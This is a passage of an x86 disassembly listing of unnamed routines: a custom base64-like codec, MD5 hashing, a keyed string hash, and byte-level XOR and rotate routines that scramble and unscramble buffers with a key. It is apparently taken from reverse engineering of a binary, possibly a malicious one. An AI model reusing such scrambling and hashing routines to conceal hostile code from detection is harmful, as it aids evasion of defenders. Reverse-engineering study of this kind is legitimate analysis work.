locret_40E941: ; CODE XREF: sub_40E618:loc_40E686�j
leave
retn
sub_40E618 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E943 proc near ; CODE XREF: sub_4167F1+2C9�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_40E94E: ; CODE XREF: sub_40E943+32�j
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40E960
jmp short locret_40E977
; ---------------------------------------------------------------------------
loc_40E960: ; CODE XREF: sub_40E943+19�j
push [ebp+var_8]
call sub_407B5E
pop ecx
mov [ebp+var_4], eax
push [ebp+var_8]
call sub_40E618
pop ecx
jmp short loc_40E94E
; ---------------------------------------------------------------------------
locret_40E977: ; CODE XREF: sub_40E943+1B�j
leave
retn
sub_40E943 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E979 proc near ; CODE XREF: sub_4167F1+E4�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40E98A
; ---------------------------------------------------------------------------
loc_40E983: ; CODE XREF: sub_40E979+24�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40E98A: ; CODE XREF: sub_40E979+8�j
cmp [ebp+var_4], 100h
jnb short loc_40E99F
mov eax, [ebp+var_4]
and byte_41E980[eax], 0
jmp short loc_40E983
; ---------------------------------------------------------------------------
loc_40E99F: ; CODE XREF: sub_40E979+18�j
and [ebp+var_4], 0
jmp short loc_40E9AC
; ---------------------------------------------------------------------------
loc_40E9A5: ; CODE XREF: sub_40E979+4C�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40E9AC: ; CODE XREF: sub_40E979+2A�j
cmp [ebp+var_4], 40h
jnb short locret_40E9C7
mov eax, [ebp+var_4]
movzx eax, byte_41A18C[eax]
mov cl, byte ptr [ebp+var_4]
mov byte_41E980[eax], cl
jmp short loc_40E9A5
; ---------------------------------------------------------------------------
locret_40E9C7: ; CODE XREF: sub_40E979+37�j
leave
retn
sub_40E979 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E9C9 proc near ; CODE XREF: sub_40A9CF+34C�p
; sub_40A9CF+E18�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 2
jnb short loc_40E9E8
xor eax, eax
jmp locret_40EB4C
; ---------------------------------------------------------------------------
loc_40E9E8: ; CODE XREF: sub_40E9C9+16�j
and [ebp+var_4], 0
and [ebp+var_8], 0
loc_40E9F0: ; CODE XREF: sub_40E9C9+17A�j
push 1
pop eax
test eax, eax
jz loc_40EB48
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EA29
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E980[eax]
shl eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EA2E
; ---------------------------------------------------------------------------
loc_40EA29: ; CODE XREF: sub_40E9C9+40�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA2E: ; CODE XREF: sub_40E9C9+5E�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EA66
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E980[eax]
sar eax, 4
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, al
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EA6B
; ---------------------------------------------------------------------------
loc_40EA66: ; CODE XREF: sub_40E9C9+72�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA6B: ; CODE XREF: sub_40E9C9+9B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EA99
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E980[eax]
shl eax, 4
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EA9E
; ---------------------------------------------------------------------------
loc_40EA99: ; CODE XREF: sub_40E9C9+B0�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA9E: ; CODE XREF: sub_40E9C9+CE�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EAD6
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E980[eax]
sar eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, al
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EAD8
; ---------------------------------------------------------------------------
loc_40EAD6: ; CODE XREF: sub_40E9C9+E2�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EAD8: ; CODE XREF: sub_40E9C9+10B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EB06
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E980[eax]
shl eax, 6
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EB08
; ---------------------------------------------------------------------------
loc_40EB06: ; CODE XREF: sub_40E9C9+11D�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EB08: ; CODE XREF: sub_40E9C9+13B�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EB3A
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, byte_41E980[eax]
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EB3C
; ---------------------------------------------------------------------------
loc_40EB3A: ; CODE XREF: sub_40E9C9+14C�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EB3C: ; CODE XREF: sub_40E9C9+16F�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
jmp loc_40E9F0
; ---------------------------------------------------------------------------
loc_40EB48: ; CODE XREF: sub_40E9C9+2C�j
; sub_40E9C9:loc_40EA29�j ...
mov eax, [ebp+var_4]
dec eax
locret_40EB4C: ; CODE XREF: sub_40E9C9+1A�j
leave
retn
sub_40E9C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EB4E proc near ; CODE XREF: sub_40A9CF+292�p
; sub_40A9CF+D12�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_4], 0
and [ebp+var_8], 0
and [ebp+var_C], 0
loc_40EB60: ; CODE XREF: sub_40EB4E:loc_40EC83�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
sar eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
shl eax, 4
and eax, 30h
mov [ebp+var_4], al
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EBC2
movzx eax, [ebp+var_4]
or al, 1
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp loc_40EC88
; ---------------------------------------------------------------------------
loc_40EBC2: ; CODE XREF: sub_40EB4E+52�j
movzx eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx]
sar ecx, 4
and ecx, 0Fh
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
shl eax, 2
and eax, 3Ch
mov [ebp+var_4], al
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EC2A
movzx eax, [ebp+var_4]
or al, 1
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_40EC88
; ---------------------------------------------------------------------------
loc_40EC2A: ; CODE XREF: sub_40EB4E+BD�j
movzx eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx]
sar ecx, 6
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
and eax, 3Fh
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EC83
jmp short loc_40EC88
; ---------------------------------------------------------------------------
loc_40EC83: ; CODE XREF: sub_40EB4E+131�j
jmp loc_40EB60
; ---------------------------------------------------------------------------
loc_40EC88: ; CODE XREF: sub_40EB4E+6F�j
; sub_40EB4E+DA�j ...
mov eax, [ebp+arg_4]
add eax, [ebp+var_C]
and byte ptr [eax], 0
mov eax, [ebp+var_C]
leave
retn
sub_40EB4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EC96 proc near ; CODE XREF: sub_40A9CF+2FA�p
; sub_40E618+FD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_40ECB4
; ---------------------------------------------------------------------------
loc_40ECAD: ; CODE XREF: sub_40EC96+3A�j
; sub_40EC96+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40ECB4: ; CODE XREF: sub_40EC96+15�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jge short loc_40ECE6
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movzx eax, byte_41E980[eax]
test eax, eax
jz short loc_40ECD2
jmp short loc_40ECAD
; ---------------------------------------------------------------------------
loc_40ECD2: ; CODE XREF: sub_40EC96+38�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 41h
jnz short loc_40ECE2
jmp short loc_40ECAD
; ---------------------------------------------------------------------------
loc_40ECE2: ; CODE XREF: sub_40EC96+48�j
xor eax, eax
jmp short locret_40ECE9
; ---------------------------------------------------------------------------
loc_40ECE6: ; CODE XREF: sub_40EC96+24�j
push 1
pop eax
locret_40ECE9: ; CODE XREF: sub_40EC96+4E�j
leave
retn
sub_40EC96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ECEB proc near ; CODE XREF: sub_4167F1+FE�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset byte_41EA84
call sub_40F26E
pop ecx
pop ecx
lea eax, byte_41EA84
push 10h
pop edx
loc_40ED29: ; CODE XREF: sub_40ECEB+46�j
mov cl, [eax]
rol cl, cl
mov [eax], cl
inc eax
dec edx
jnz short loc_40ED29
pop edi
pop esi
pop ebx
leave
retn
sub_40ECEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED38 proc near ; CODE XREF: sub_40A9CF+14�p
; sub_41113B+159�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
xor ecx, ecx
xor eax, eax
loc_40ED45: ; CODE XREF: sub_40ED38+2F�j
mov cl, [esi]
test ecx, ecx
jz short loc_40ED69
cmp ecx, 61h
jb short loc_40ED53
sub ecx, 20h
loc_40ED53: ; CODE XREF: sub_40ED38+16�j
and ecx, 7Fh
add eax, ecx
and ecx, 0Fh
mov cl, byte_41EA84[ecx]
add eax, ecx
rol eax, 3
inc esi
jmp short loc_40ED45
; ---------------------------------------------------------------------------
loc_40ED69: ; CODE XREF: sub_40ED38+11�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40ED38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED6E proc near ; CODE XREF: sub_4167F1+10C�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset dword_41EA98
call sub_40F26E
pop ecx
pop ecx
lea esi, dword_41EA98
mov edi, esi
push 10h
pop ecx
loc_40EDAE: ; CODE XREF: sub_40ED6E+48�j
lodsb
xor al, 0AAh
add al, al
or al, 1
stosb
loop loc_40EDAE
pop edi
pop esi
pop ebx
leave
retn
sub_40ED6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EDBD proc near ; CODE XREF: sub_40EF29+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40EDCE
; ---------------------------------------------------------------------------
loc_40EDC7: ; CODE XREF: sub_40EDBD+AF�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40EDCE: ; CODE XREF: sub_40EDBD+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jge locret_40EE71
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
sub al, 33h
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_8]
mov al, [eax]
sub al, [ecx+edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
not eax
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
xor cl, al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov [eax], cl
mov eax, [ebp+arg_4]
cdq
push 10h
pop ecx
idiv ecx
shl edx, 2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, dl
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
add al, 1
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp loc_40EDC7
; ---------------------------------------------------------------------------
locret_40EE71: ; CODE XREF: sub_40EDBD+17�j
leave
retn
sub_40EDBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EE73 proc near ; CODE XREF: sub_40EF41+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40EE84
; ---------------------------------------------------------------------------
loc_40EE7D: ; CODE XREF: sub_40EE73+AF�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40EE84: ; CODE XREF: sub_40EE73+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jge locret_40EF27
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
sub al, 1
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_4]
cdq
push 10h
pop ecx
idiv ecx
shl edx, 2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, dl
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
not eax
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
xor cl, al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov [eax], cl
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_8]
mov al, [eax]
add al, [ecx+edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
add al, 33h
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp loc_40EE7D
; ---------------------------------------------------------------------------
locret_40EF27: ; CODE XREF: sub_40EE73+17�j
leave
retn
sub_40EE73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF29 proc near ; CODE XREF: sub_40A9CF+25D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_41EA98
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40EDBD
add esp, 0Ch
pop ebp
retn
sub_40EF29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF41 proc near ; CODE XREF: sub_40A9CF+380�p
; sub_40D871+7AD�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_41EA98
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40EE73
add esp, 0Ch
pop ebp
retn
sub_40EF41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF59 proc near ; CODE XREF: sub_40A9CF+271�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_4]
push [ebp+arg_0]
mov eax, [ebp+arg_0]
add eax, 4
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
call sub_410422
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 4
mov [ebp+arg_0], eax
and [ebp+var_8], 0
jmp short loc_40EF91
; ---------------------------------------------------------------------------
loc_40EF8A: ; CODE XREF: sub_40EF59+7E�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40EF91: ; CODE XREF: sub_40EF59+2F�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jge short loc_40EFD9
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
add al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
push 1
push [ebp+var_4]
call sub_416DF6 ; _lrotl
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
jmp short loc_40EF8A
; ---------------------------------------------------------------------------
loc_40EFD9: ; CODE XREF: sub_40EF59+3E�j
mov eax, [ebp+arg_4]
dec eax
mov [ebp+var_8], eax
jmp short loc_40EFE9
; ---------------------------------------------------------------------------
loc_40EFE2: ; CODE XREF: sub_40EF59+D4�j
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
loc_40EFE9: ; CODE XREF: sub_40EF59+87�j
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_40F02F
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
add al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
push 1
push [ebp+var_4]
call sub_416DF6 ; _lrotl
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
jmp short loc_40EFE2
; ---------------------------------------------------------------------------
loc_40F02F: ; CODE XREF: sub_40EF59+94�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
mov [eax-4], ecx
mov eax, [ebp+arg_4]
add eax, 4
leave
retn
sub_40EF59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F040 proc near ; CODE XREF: sub_40A9CF+366�p
; sub_40D871+792�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
sub eax, 4
push eax
mov eax, [ebp+arg_0]
add eax, 4
push eax
push [ebp+arg_0]
call sub_416E02 ; memmove
add esp, 0Ch
mov eax, [ebp+arg_4]
sub eax, 4
mov [ebp+arg_4], eax
and [ebp+var_8], 0
jmp short loc_40F07C
; ---------------------------------------------------------------------------
loc_40F075: ; CODE XREF: sub_40F040+82�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40F07C: ; CODE XREF: sub_40F040+33�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jge short loc_40F0C4
mov eax, [ebp+var_4]
sub eax, [ebp+var_8]
mov [ebp+var_4], eax
push 1
push [ebp+var_4]
call sub_416DFC ; _lrotr
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
sub al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_40F075
; ---------------------------------------------------------------------------
loc_40F0C4: ; CODE XREF: sub_40F040+42�j
mov eax, [ebp+arg_4]
dec eax
mov [ebp+var_8], eax
jmp short loc_40F0D4
; ---------------------------------------------------------------------------
loc_40F0CD: ; CODE XREF: sub_40F040+D8�j
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
loc_40F0D4: ; CODE XREF: sub_40F040+8B�j
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_40F11A
mov eax, [ebp+var_4]
sub eax, [ebp+var_8]
mov [ebp+var_4], eax
push 1
push [ebp+var_4]
call sub_416DFC ; _lrotr
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
sub al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_40F0CD
; ---------------------------------------------------------------------------
loc_40F11A: ; CODE XREF: sub_40F040+98�j
mov eax, [ebp+arg_4]
leave
retn
sub_40F040 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F11F proc near ; CODE XREF: sub_40ECEB+D�p
; sub_40ED6E+D�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov dword ptr [eax], 67452301h
mov eax, [ebp+arg_0]
mov dword ptr [eax+4], 0EFCDAB89h
mov eax, [ebp+arg_0]
mov dword ptr [eax+8], 98BADCFEh
mov eax, [ebp+arg_0]
mov dword ptr [eax+0Ch], 10325476h
mov eax, [ebp+arg_0]
and dword ptr [eax+10h], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+14h], 0
pop ebp
retn
sub_40F11F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F159 proc near ; CODE XREF: sub_40ECEB+1D�p
; sub_40ED6E+1D�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax+10h]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax*8]
mov ecx, [ebp+arg_0]
mov [ecx+10h], eax
mov eax, [ebp+arg_0]
mov eax, [eax+10h]
cmp eax, [ebp+var_4]
jnb short loc_40F18E
mov eax, [ebp+arg_0]
mov eax, [eax+14h]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+14h], eax
loc_40F18E: ; CODE XREF: sub_40F159+26�j
mov eax, [ebp+arg_8]
shr eax, 1Dh
mov ecx, [ebp+arg_0]
mov ecx, [ecx+14h]
add ecx, eax
mov eax, [ebp+arg_0]
mov [eax+14h], ecx
mov eax, [ebp+var_4]
shr eax, 3
and eax, 3Fh
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_40F21C
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax+18h]
mov [ebp+var_8], eax
push 40h
pop eax
sub eax, [ebp+var_4]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
cmp eax, [ebp+var_4]
jnb short loc_40F1E8
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+var_8]
call sub_416B52 ; memcpy
add esp, 0Ch
jmp locret_40F26C
; ---------------------------------------------------------------------------
loc_40F1E8: ; CODE XREF: sub_40F159+77�j
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+var_8]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 18h
push eax
push [ebp+arg_0]
call sub_40F3CE
pop ecx
pop ecx
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
sub eax, [ebp+var_4]
mov [ebp+arg_8], eax
loc_40F21C: ; CODE XREF: sub_40F159+59�j
; sub_40F159+FC�j
cmp [ebp+arg_8], 40h
jb short loc_40F257
push 40h
push [ebp+arg_4]
mov eax, [ebp+arg_0]
add eax, 18h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40F3CE
pop ecx
pop ecx
mov eax, [ebp+arg_4]
add eax, 40h
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
sub eax, 40h
mov [ebp+arg_8], eax
jmp short loc_40F21C
; ---------------------------------------------------------------------------
loc_40F257: ; CODE XREF: sub_40F159+C7�j
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_0]
add eax, 18h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
locret_40F26C: ; CODE XREF: sub_40F159+8A�j
leave
retn
sub_40F159 endp
; =============== S U B R O U T I N E =======================================
